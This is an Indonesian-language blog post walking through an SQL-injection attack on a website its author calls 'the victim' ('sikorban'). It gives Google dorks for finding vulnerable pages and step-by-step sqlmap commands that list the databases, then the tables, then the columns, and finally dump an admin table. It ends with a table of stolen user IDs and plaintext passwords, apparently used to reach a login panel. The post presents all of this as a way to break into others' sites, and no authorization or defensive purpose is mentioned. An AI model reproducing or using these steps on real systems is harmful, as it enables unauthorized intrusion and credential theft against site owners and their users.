Wednesday, September 12, 2012

Talent does what it can, genius does what it must.

Menembus database website vulner SQL-Injection

Suatu waktu disaat sedang browsing website-website, ada keinginan belajar hacking sebuah situs web. alhasil googling belajar sana sini mencari tutorial SQL-Injection banyak beragam macam cara. Salah satu nya adalah dengan menggunakan tools sqlmap di backtrack 5.
Berikut ini saya mencoba belajar menembus database website dengan menggunakan tools sqlmap di backtrack 5 :
Mencari celah SQL-Injection website si korban dengan menggunakan Dork Sql Injection
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:news.php?news=
hasilnya saya mendapatkan sebuah celah di website
/root]─> http://sikorban.com/news.php?news=212
Buka tools sqlmap dengan cara
/root]─> Application - Backtrack - Exploitation Tools - Web Exploitation Tools - sqlmap
Ikuti perintah penggunnaan tools slmap di terminal/konsole, untuk mencari databaste website sikorban
/root]─> python sqlmap.py -u http://sikorban.com/news.php?news=212 --dbs
  -u     = url sikorban
- -dbs = mencari database website
setelah ketemu database nya sikorban lanjutkan dengan mencari tables yg berada dalam database
/root]─> python sqlmap.py -u http://sikorban.com/news.php?news=212 -D sikorban –tables
-D = database yg sudah ditemukan
- -tables = untuk membuka isi database dalam tables
isi tables telah ditemukan, selanjutnya saya mencari isi dari tables itu  misalkan tables admin
/root]─> python sqlmap.py http://sikorban.com/news.php?news=212 -D sikorban -T admin --columns
-D = database yg  sudah ditemukan
-T = isi tables
- -columns = untuk membuka isi tables dalam columns
selanjutnya saya extract columns tersebut dengan menggunakan perintah di terminal/konsole
/root]─> python sqlmap.py http://sikorban.com/news.php?news=212 -D sikorban -T admin -C no,pwd,status,uid --dump
-D = database yg  sudah ditemukan
-T = isi tables
-C = untuk membuka isi columns
- -dump = menyimpan hasil file yg ditemukan, file tersebut berada di /pentest/database/sqlmap/output/sikorban.com
setelah belajar berbulan-bulan akhirnya berhasil juga mendapatkan userid passwd untuk masuk ke halaman panel login.
+————–+—-+——————+——–+
|  uid                 | no | pwd                       | status |
+————–+—-+——————+——–+
| sikorban1     | 1     | admin1235321  |   A       |
| sikorban2     | 4     | tes23tes              |   I        |
+———— -+—–+——————+——-+

No comments:

Post a Comment